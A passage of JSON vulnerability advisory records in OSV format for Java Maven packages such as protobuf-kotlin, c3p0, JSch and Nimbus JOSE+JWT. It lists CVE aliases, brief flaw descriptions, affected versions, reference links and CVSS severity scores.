{ "name": "com.google.protobuf:protobuf-kotlin", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-kotlin" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.19.0" }, { "fixed": "3.19.2" } ] } ], "versions": [ "3.19.0", "3.19.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/01/GHSA-wrvw-hg22-4m67/GHSA-wrvw-hg22-4m67.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/protocolbuffers/protobuf/security/advisories/GHSA-wrvw-hg22-4m67" }, { "type": "ADVISORY", "url": 
"https://nvd.nist.gov/vuln/detail/CVE-2021-22569" }, { "type": "WEB", "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=39330" }, { "type": "WEB", "url": "https://cloud.google.com/support/bulletins#gcp-2022-001" }, { "type": "PACKAGE", "url": "https://github.com/protocolbuffers/protobuf" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2022/01/12/4" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2022/01/12/7" } ], "database_specific": { "cwe_ids": [ "CWE-696" ], "github_reviewed": true, "github_reviewed_at": "2022-01-07T22:23:14Z", "nvd_published_at": "2022-01-10T14:10:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-3vrc-rrpw-r5pw", "published": "2023-02-19T18:30:21Z", "modified": "2024-03-01T14:52:28.150101Z", "aliases": [ "CVE-2014-125087" ], "summary": "java-xmlbuilder vulnerable to XML External Entity Reference", "details": "A vulnerability was found in java-xmlbuilder up to 1.1. It has been rated as problematic. Affected by this issue is some unknown functionality. The manipulation leads to xml external entity reference. Upgrading to version 1.2 is able to address this issue. The name of the patch is e6fddca201790abab4f2c274341c0bb8835c3e73. It is recommended to upgrade the affected component. 
The identifier of this vulnerability is VDB-221480.", "affected": [ { "package": { "name": "com.jamesmurty.utils:java-xmlbuilder", "ecosystem": "Maven", "purl": "pkg:maven/com.jamesmurty.utils/java-xmlbuilder" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.2" } ] } ], "versions": [ "0.3", "0.4", "0.6", "1.0", "1.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-3vrc-rrpw-r5pw/GHSA-3vrc-rrpw-r5pw.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-125087" }, { "type": "WEB", "url": "https://github.com/jmurty/java-xmlbuilder/issues/6" }, { "type": "WEB", "url": "https://github.com/jmurty/java-xmlbuilder/commit/e6fddca201790abab4f2c274341c0bb8835c3e73" }, { "type": "PACKAGE", "url": "https://github.com/jmurty/java-xmlbuilder" }, { "type": "WEB", "url": "https://github.com/jmurty/java-xmlbuilder/releases/tag/v1.2" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20240208-0009" }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.221480" }, { "type": "WEB", "url": "https://vuldb.com/?id.221480" } ], "database_specific": { "cwe_ids": [ "CWE-611" ], "github_reviewed": true, "github_reviewed_at": "2023-03-01T20:46:06Z", "nvd_published_at": "2023-02-19T17:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-q446-82vq-w674", "published": "2022-05-13T01:09:33Z", "modified": "2024-02-20T05:33:38.873866Z", "aliases": [ "CVE-2016-5725" ], "summary": "Improper Limitation of a Pathname to a Restricted Directory in JCraft JSch", "details": "Directory traversal vulnerability in JCraft JSch before 0.1.54 on Windows, when the mode is ChannelSftp.OVERWRITE, allows remote SFTP servers to write to arbitrary files via a ..\\ (dot dot backslash) in a response to a recursive GET 
command.", "affected": [ { "package": { "name": "com.jcraft:jsch", "ecosystem": "Maven", "purl": "pkg:maven/com.jcraft/jsch" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "0.1.54" } ] } ], "versions": [ "0.1.23", "0.1.24", "0.1.25", "0.1.27", "0.1.29", "0.1.31", "0.1.38", "0.1.41", "0.1.42", "0.1.43", "0.1.43-1", "0.1.44", "0.1.44-1", "0.1.45", "0.1.46", "0.1.47", "0.1.48", "0.1.49", "0.1.50", "0.1.51", "0.1.52", "0.1.53" ], "database_specific": { "last_known_affected_version_range": "\u003c= 0.1.53", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-q446-82vq-w674/GHSA-q446-82vq-w674.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-5725" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:3115" }, { "type": "WEB", "url": "https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-5725" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/04/msg00017.html" }, { "type": "WEB", "url": "https://www.exploit-db.com/exploits/40411" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "http://packetstormsecurity.com/files/138809/jsch-0.1.53-Path-Traversal.html" }, { "type": "WEB", "url": "http://seclists.org/fulldisclosure/2016/Sep/53" }, { "type": "WEB", "url": "http://www.jcraft.com/jsch/ChangeLog" } ], "database_specific": { "cwe_ids": [ "CWE-22" ], "github_reviewed": true, "github_reviewed_at": "2022-07-06T19:44:21Z", "nvd_published_at": "2017-01-19T22:59:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-84p2-vf58-xhxv", "published": 
"2019-04-23T16:03:18Z", "modified": "2024-02-16T08:07:45.873484Z", "aliases": [ "CVE-2019-5427" ], "summary": "Billion laughs attack in c3p0", "details": "c3p0 version \u003c 0.9.5.4 may be exploited by a billion laughs attack when loading XML configuration due to missing protections against recursive entity expansion when loading configuration.", "affected": [ { "package": { "name": "com.mchange:c3p0", "ecosystem": "Maven", "purl": "pkg:maven/com.mchange/c3p0" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "0.9.5.4" } ] } ], "versions": [ "0.9.2", "0.9.2-pre2-RELEASE", "0.9.2-pre3", "0.9.2-pre4", "0.9.2-pre5", "0.9.2-pre6", "0.9.2-pre7", "0.9.2-pre8", "0.9.2.1", "0.9.5", "0.9.5-pre1", "0.9.5-pre10", "0.9.5-pre2", "0.9.5-pre3", "0.9.5-pre4", "0.9.5-pre5", "0.9.5-pre6", "0.9.5-pre7", "0.9.5-pre8", "0.9.5-pre9", "0.9.5.1", "0.9.5.2", "0.9.5.3" ], "database_specific": { "last_known_affected_version_range": "\u003c= 0.9.5.3", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/04/GHSA-84p2-vf58-xhxv/GHSA-84p2-vf58-xhxv.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-5427" }, { "type": "WEB", "url": "https://hackerone.com/reports/509315" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BFIVX6HOVNLAM7W3SUAMHYRNLCVQSAWR" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MQ47OFV57Y2DAHMGA5H3JOL4WHRWRFN4" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": 
"https://www.oracle.com/security-alerts/cpuoct2021.html" } ], "database_specific": { "cwe_ids": [ "CWE-776" ], "github_reviewed": true, "github_reviewed_at": "2019-04-23T16:01:51Z", "nvd_published_at": "2019-04-22T21:29:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-q485-j897-qc27", "published": "2019-01-07T19:14:34Z", "modified": "2024-02-17T05:36:17.856971Z", "aliases": [ "CVE-2018-20433" ], "summary": "XML External Entity Reference in mchange:c3p0", "details": "c3p0 0.9.5.2 allows XXE in extractXmlConfigFromInputStream in com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java during initialization.", "affected": [ { "package": { "name": "com.mchange:c3p0", "ecosystem": "Maven", "purl": "pkg:maven/com.mchange/c3p0" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "0.9.5.3" } ] } ], "versions": [ "0.9.2", "0.9.2-pre2-RELEASE", "0.9.2-pre3", "0.9.2-pre4", "0.9.2-pre5", "0.9.2-pre6", "0.9.2-pre7", "0.9.2-pre8", "0.9.2.1", "0.9.5", "0.9.5-pre1", "0.9.5-pre10", "0.9.5-pre2", "0.9.5-pre3", "0.9.5-pre4", "0.9.5-pre5", "0.9.5-pre6", "0.9.5-pre7", "0.9.5-pre8", "0.9.5-pre9", "0.9.5.1", "0.9.5.2" ], "database_specific": { "last_known_affected_version_range": "\u003c= 0.9.5.2", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/01/GHSA-q485-j897-qc27/GHSA-q485-j897-qc27.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-20433" }, { "type": "WEB", "url": "https://github.com/zhutougg/c3p0/commit/2eb0ea97f745740b18dd45e4a909112d4685f87b" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-q485-j897-qc27" }, { "type": "PACKAGE", "url": "https://github.com/zhutougg/c3p0" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2018/12/msg00021.html" }, { "type": "WEB", "url": 
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BFIVX6HOVNLAM7W3SUAMHYRNLCVQSAWR" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MQ47OFV57Y2DAHMGA5H3JOL4WHRWRFN4" } ], "database_specific": { "cwe_ids": [ "CWE-611" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:50:54Z", "nvd_published_at": null, "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-2qp9-wg27-9pcv", "published": "2022-05-13T01:30:32Z", "modified": "2023-11-08T03:58:54.698483Z", "aliases": [ "CVE-2017-12972" ], "summary": "Nimbus JOSE+JWT missing overflow check", "details": "In Nimbus JOSE+JWT before 4.39, there is no integer-overflow check when converting length values from bytes to bits, which allows attackers to conduct HMAC bypass attacks by shifting Additional Authenticated Data (AAD) and ciphertext so that different plaintext is obtained for the same HMAC.", "affected": [ { "package": { "name": "com.nimbusds:nimbus-jose-jwt", "ecosystem": "Maven", "purl": "pkg:maven/com.nimbusds/nimbus-jose-jwt" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "4.39" } ] } ], "versions": [ "2.10", "2.10.1", "2.11.0", "2.12.0", "2.13.0", "2.13.1", "2.14.0", "2.15.0", "2.15.1", "2.15.2", "2.16", "2.17", "2.17.1", "2.17.2", "2.18", "2.18.1", "2.18.2", "2.19", "2.19.1", "2.20", "2.21", "2.22", "2.22.1", "2.23", "2.24", "2.25", "2.26", "2.26.1", "2.9", "3.0", "3.1", "3.1.1", "3.1.2", "3.10", "3.2", "3.2.1", "3.2.2", "3.3", "3.4", "3.5", "3.6", "3.7", "3.8", "3.8.1", "3.8.2", "3.9", "3.9.1", "3.9.2", "4.0", "4.0-rc1", "4.0-rc2", "4.0-rc3", "4.0-rc4", "4.0.1", "4.1", "4.1.1", "4.10", "4.11", "4.11.1", "4.11.2", "4.12", "4.13", "4.13.1", "4.14", "4.15", "4.15.1", "4.16", "4.16.1", "4.16.2", "4.17", "4.18", "4.19", "4.2", "4.20", "4.21", 
"4.22", "4.23", "4.24", "4.25", "4.26", "4.26.1", "4.27", "4.27.1", "4.28", "4.29", "4.3", "4.3.1", "4.30", "4.31.1", "4.32", "4.33", "4.34", "4.34.1", "4.34.2", "4.35", "4.36", "4.36.1", "4.37", "4.37.1", "4.38", "4.4", "4.5", "4.6", "4.7", "4.8", "4.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-2qp9-wg27-9pcv/GHSA-2qp9-wg27-9pcv.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-12972" }, { "type": "WEB", "url": "https://bitbucket.org/connect2id/nimbus-jose-jwt/commits/0d2bd649ea386539220d4facfe1f65eb1dadb86c" }, { "type": "WEB", "url": "https://bitbucket.org/connect2id/nimbus-jose-jwt/issues/224/byte-to-bit-overflow-in-cbc" }, { "type": "WEB", "url": "https://bitbucket.org/connect2id/nimbus-jose-jwt/src/master/CHANGELOG.txt" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe@%3Ccommits.druid.apache.org%3E" } ], "database_specific": { "cwe_ids": [ "CWE-345" ], "github_reviewed": true, "github_reviewed_at": "2022-11-08T22:28:09Z", "nvd_published_at": "2017-08-20T16:29:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-f6vf-pq8c-69m4", "published": "2019-10-16T18:31:17Z", "modified": "2024-03-14T05:19:45.441054Z", "aliases": [ "CVE-2019-17195" ], "summary": "Improper Check for Unusual or Exceptional Conditions in Connect2id Nimbus JOSE+JWT", "details": "Connect2id Nimbus JOSE+JWT before v7.9 can throw various uncaught exceptions while parsing a JWT, which could result in an application crash (potential information disclosure) or a potential authentication bypass.", "affected": [ { "package": { "name": "com.nimbusds:nimbus-jose-jwt", "ecosystem": "Maven", "purl": "pkg:maven/com.nimbusds/nimbus-jose-jwt" }, "ranges": [ { "type": "ECOSYSTEM", 
"events": [ { "introduced": "0" }, { "fixed": "7.9" } ] } ], "versions": [ "2.10", "2.10.1", "2.11.0", "2.12.0", "2.13.0", "2.13.1", "2.14.0", "2.15.0", "2.15.1", "2.15.2", "2.16", "2.17", "2.17.1", "2.17.2", "2.18", "2.18.1", "2.18.2", "2.19", "2.19.1", "2.20", "2.21", "2.22", "2.22.1", "2.23", "2.24", "2.25", "2.26", "2.26.1", "2.9", "3.0", "3.1", "3.1.1", "3.1.2", "3.10", "3.2", "3.2.1", "3.2.2", "3.3", "3.4", "3.5", "3.6", "3.7", "3.8", "3.8.1", "3.8.2", "3.9", "3.9.1", "3.9.2", "4.0", "4.0-rc1", "4.0-rc2", "4.0-rc3", "4.0-rc4", "4.0.1", "4.1", "4.1.1", "4.10", "4.11", "4.11.1", "4.11.2", "4.12", "4.13", "4.13.1", "4.14", "4.15", "4.15.1", "4.16", "4.16.1", "4.16.2", "4.17", "4.18", "4.19", "4.2", "4.20", "4.21", "4.22", "4.23", "4.24", "4.25", "4.26", "4.26.1", "4.27", "4.27.1", "4.28", "4.29", "4.3", "4.3.1", "4.30", "4.31.1", "4.32", "4.33", "4.34", "4.34.1", "4.34.2", "4.35", "4.36", "4.36.1", "4.37", "4.37.1", "4.38", "4.39", "4.39.1", "4.39.2", "4.4", "4.40", "4.41", "4.41.1", "4.41.2", "4.41.3", "4.5", "4.6", "4.7", "4.8", "4.9", "5.0", "5.1", "5.10", "5.11", "5.12", "5.13", "5.14", "5.2", "5.3", "5.4", "5.5", "5.6", "5.7", "5.8", "5.9", "6.0", "6.0.1", "6.0.2", "6.1", "6.1.1", "6.2", "6.3", "6.3.1", "6.4", "6.4.1", "6.4.2", "6.5", "6.5.1", "6.6", "6.7", "6.8", "7.0", "7.0.1", "7.1", "7.2.1", "7.3", "7.4", "7.5", "7.5.1", "7.6", "7.7", "7.8", "7.8.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/10/GHSA-f6vf-pq8c-69m4/GHSA-f6vf-pq8c-69m4.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-17195" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { 
"type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rcac26c2d4df22341fa6ebbfe93ba1eff77d2dcd3f6106a1dc1f9ac98@%3Cdev.avro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5e08837e695efd36be73510ce58ec05785dbcea077819d8acc2d990d@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r35f6301a3e6a56259224786dd9c2a935ba27ff6b494d15a3b66efe6a@%3Cdev.avro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r33dc233634aedb04fa77db3eb79ea12d15ca4da89fa46a1c585ecb0b@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2667286c8ceffaf893b16829b9612d8f7c4ee6b30362c6c1b583e3c2@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/e10d43984f39327e443e875adcd4a5049193a7c010e81971908caf41@%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/8768553cda5838f59ee3865cac546e824fa740e82d9dc2a7fc44e80d@%3Ccommon-dev.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://connect2id.com/blog/nimbus-jose-jwt-7-9" }, { "type": "WEB", "url": "https://bitbucket.org/connect2id/nimbus-jose-jwt/src/master/SECURITY-CHANGELOG.txt" }, { "type": "PACKAGE", "url": "https://bitbucket.org/connect2id/nimbus-jose-jwt" } ], "database_specific": { "cwe_ids": [ "CWE-754", "CWE-755" ], "github_reviewed": true, "github_reviewed_at": "2019-10-16T15:26:53Z", "nvd_published_at": "2019-10-15T14:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-gvpg-vgmx-xg6w", "published": 
"2024-02-11T06:30:27Z", "modified": "2024-10-30T21:46:42.418884Z", "aliases": [ "CGA-hvjw-cqfw-cqf3", "CVE-2023-52428" ], "related": [ "CGA-63mv-w982-8q6x", "CGA-7847-h394-6rg8", "CGA-7v5w-r37c-32w7", "CGA-7x8r-hc4w-927c", "CGA-88mj-xqrj-5rg4", "CGA-xqhq-97gr-pfg7" ], "summary": "Denial of Service in Connect2id Nimbus JOSE+JWT", "details": "In Connect2id Nimbus JOSE+JWT before 9.37.2, an attacker can cause a denial of service (resource consumption) via a large JWE p2c header value (aka iteration count) for the PasswordBasedDecrypter (PBKDF2) component.", "affected": [ { "package": { "name": "com.nimbusds:nimbus-jose-jwt", "ecosystem": "Maven", "purl": "pkg:maven/com.nimbusds/nimbus-jose-jwt" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "9.37.2" } ] } ], "versions": [ "2.10", "2.10.1", "2.11.0", "2.12.0", "2.13.0", "2.13.1", "2.14.0", "2.15.0", "2.15.1", "2.15.2", "2.16", "2.17", "2.17.1", "2.17.2", "2.18", "2.18.1", "2.18.2", "2.19", "2.19.1", "2.20", "2.21", "2.22", "2.22.1", "2.23", "2.24", "2.25", "2.26", "2.26.1", "2.9", "3.0", "3.1", "3.1.1", "3.1.2", "3.10", "3.2", "3.2.1", "3.2.2", "3.3", "3.4", "3.5", "3.6", "3.7", "3.8", "3.8.1", "3.8.2", "3.9", "3.9.1", "3.9.2", "4.0", "4.0-rc1", "4.0-rc2", "4.0-rc3", "4.0-rc4", "4.0.1", "4.1", "4.1.1", "4.10", "4.11", "4.11.1", "4.11.2", "4.12", "4.13", "4.13.1", "4.14", "4.15", "4.15.1", "4.16", "4.16.1", "4.16.2", "4.17", "4.18", "4.19", "4.2", "4.20", "4.21", "4.22", "4.23", "4.24", "4.25", "4.26", "4.26.1", "4.27", "4.27.1", "4.28", "4.29", "4.3", "4.3.1", "4.30", "4.31.1", "4.32", "4.33", "4.34", "4.34.1", "4.34.2", "4.35", "4.36", "4.36.1", "4.37", "4.37.1", "4.38", "4.39", "4.39.1", "4.39.2", "4.4", "4.40", "4.41", "4.41.1", "4.41.2", "4.41.3", "4.5", "4.6", "4.7", "4.8", "4.9", "5.0", "5.1", "5.10", "5.11", "5.12", "5.13", "5.14", "5.2", "5.3", "5.4", "5.5", "5.6", "5.7", "5.8", "5.9", "6.0", "6.0.1", "6.0.2", "6.1", "6.1.1", "6.2", "6.3", "6.3.1", "6.4", "6.4.1", "6.4.2", 
"6.5", "6.5.1", "6.6", "6.7", "6.8", "7.0", "7.0.1", "7.1", "7.2.1", "7.3", "7.4", "7.5", "7.5.1", "7.6", "7.7", "7.8", "7.8.1", "7.9", "8.0", "8.1", "8.10", "8.11", "8.12", "8.13", "8.14", "8.14.1", "8.15", "8.16", "8.17", "8.17.1", "8.18", "8.18.1", "8.19", "8.2", "8.2.1", "8.20", "8.20.1", "8.20.2", "8.21", "8.21.1", "8.22", "8.22.1", "8.23", "8.3", "8.4", "8.4.1", "8.5", "8.5.1", "8.6", "8.7", "8.8", "8.9", "9.0", "9.0.1", "9.1", "9.1.1", "9.1.2", "9.1.3", "9.1.4", "9.1.5", "9.10", "9.10.1", "9.11", "9.11.1", "9.11.2", "9.11.3", "9.12", "9.12.1", "9.13", "9.14", "9.15", "9.15.1", "9.15.2", "9.16", "9.16-preview.1", "9.16.1", "9.17", "9.18", "9.19", "9.2", "9.20", "9.21", "9.21.1", "9.22", "9.23", "9.24", "9.24.1", "9.24.2", "9.24.3", "9.24.4", "9.25", "9.25.1", "9.25.2", "9.25.3", "9.25.4", "9.25.5", "9.25.6", "9.26", "9.27", "9.28", "9.29", "9.3", "9.30", "9.30.1", "9.30.2", "9.31", "9.32", "9.33", "9.34", "9.35", "9.36", "9.37", "9.37.1", "9.4", "9.4.1", "9.4.2", "9.5", "9.6", "9.6.1", "9.7", "9.8", "9.8.1", "9.9", "9.9.1", "9.9.2", "9.9.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/02/GHSA-gvpg-vgmx-xg6w/GHSA-gvpg-vgmx-xg6w.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52428" }, { "type": "PACKAGE", "url": "https://bitbucket.org/connect2id/nimbus-jose-jwt" }, { "type": "WEB", "url": "https://bitbucket.org/connect2id/nimbus-jose-jwt/commits/3b3b77e" }, { "type": "WEB", "url": "https://bitbucket.org/connect2id/nimbus-jose-jwt/issues/526" }, { "type": "WEB", "url": "https://connect2id.com/products/nimbus-jose-jwt" } ], "database_specific": { "cwe_ids": [ "CWE-400", "CWE-770" ], "github_reviewed": true, "github_reviewed_at": "2024-03-15T14:23:03Z", "nvd_published_at": "2024-02-11T05:15:08Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "type": "CVSS_V4", 
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-jfmq-4g4m-99rh", "published": "2022-05-13T01:42:51Z", "modified": "2023-11-08T03:58:54.759362Z", "aliases": [ "CVE-2017-12973" ], "summary": "Nimbus JOSE+JWT vulnerable to padding oracle attack", "details": "Nimbus JOSE+JWT before 4.39 proceeds improperly after detection of an invalid HMAC in authenticated AES-CBC decryption, which allows attackers to conduct a padding oracle attack.", "affected": [ { "package": { "name": "com.nimbusds:nimbus-jose-jwt", "ecosystem": "Maven", "purl": "pkg:maven/com.nimbusds/nimbus-jose-jwt" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "4.39" } ] } ], "versions": [ "2.10", "2.10.1", "2.11.0", "2.12.0", "2.13.0", "2.13.1", "2.14.0", "2.15.0", "2.15.1", "2.15.2", "2.16", "2.17", "2.17.1", "2.17.2", "2.18", "2.18.1", "2.18.2", "2.19", "2.19.1", "2.20", "2.21", "2.22", "2.22.1", "2.23", "2.24", "2.25", "2.26", "2.26.1", "2.9", "3.0", "3.1", "3.1.1", "3.1.2", "3.10", "3.2", "3.2.1", "3.2.2", "3.3", "3.4", "3.5", "3.6", "3.7", "3.8", "3.8.1", "3.8.2", "3.9", "3.9.1", "3.9.2", "4.0", "4.0-rc1", "4.0-rc2", "4.0-rc3", "4.0-rc4", "4.0.1", "4.1", "4.1.1", "4.10", "4.11", "4.11.1", "4.11.2", "4.12", "4.13", "4.13.1", "4.14", "4.15", "4.15.1", "4.16", "4.16.1", "4.16.2", "4.17", "4.18", "4.19", "4.2", "4.20", "4.21", "4.22", "4.23", "4.24", "4.25", "4.26", "4.26.1", "4.27", "4.27.1", "4.28", "4.29", "4.3", "4.3.1", "4.30", "4.31.1", "4.32", "4.33", "4.34", "4.34.1", "4.34.2", "4.35", "4.36", "4.36.1", "4.37", "4.37.1", "4.38", "4.4", "4.5", "4.6", "4.7", "4.8", "4.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-jfmq-4g4m-99rh/GHSA-jfmq-4g4m-99rh.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-12973" }, { "type": "WEB", "url": 
"https://bitbucket.org/connect2id/nimbus-jose-jwt/commits/6a29f10f723f406eb25555f55842c59a43a38912" }, { "type": "WEB", "url": "https://bitbucket.org/connect2id/nimbus-jose-jwt/issues/223/aescbc-return-immediately-on-invalid-hmac" }, { "type": "WEB", "url": "https://bitbucket.org/connect2id/nimbus-jose-jwt/src/master/CHANGELOG.txt" } ], "database_specific": { "cwe_ids": [ "CWE-354" ], "github_reviewed": true, "github_reviewed_at": "2022-11-08T23:03:33Z", "nvd_published_at": "2017-08-20T16:29:00Z", "severity": "LOW" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-pfv2-37f7-9m6w", "published": "2022-05-13T01:30:32Z", "modified": "2023-11-08T03:58:54.822926Z", "aliases": [ "CVE-2017-12974" ], "summary": "Improper Verification of Cryptographic Signature in Nimbus JOSE+JWT", "details": "Nimbus JOSE+JWT before 4.36 proceeds with ECKey construction without ensuring that the public x and y coordinates are on the specified curve, which allows attackers to conduct an Invalid Curve Attack in environments where the JCE provider lacks the applicable curve validation.", "affected": [ { "package": { "name": "com.nimbusds:nimbus-jose-jwt", "ecosystem": "Maven", "purl": "pkg:maven/com.nimbusds/nimbus-jose-jwt" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "4.36" } ] } ], "versions": [ "2.10", "2.10.1", "2.11.0", "2.12.0", "2.13.0", "2.13.1", "2.14.0", "2.15.0", "2.15.1", "2.15.2", "2.16", "2.17", "2.17.1", "2.17.2", "2.18", "2.18.1", "2.18.2", "2.19", "2.19.1", "2.20", "2.21", "2.22", "2.22.1", "2.23", "2.24", "2.25", "2.26", "2.26.1", "2.9", "3.0", "3.1", "3.1.1", "3.1.2", "3.10", "3.2", "3.2.1", "3.2.2", "3.3", "3.4", "3.5", "3.6", "3.7", "3.8", "3.8.1", "3.8.2", "3.9", "3.9.1", "3.9.2", "4.0", "4.0-rc1", "4.0-rc2", "4.0-rc3", "4.0-rc4", "4.0.1", "4.1", "4.1.1", "4.10", "4.11", "4.11.1", "4.11.2", "4.12", "4.13", "4.13.1", "4.14", "4.15", "4.15.1", 
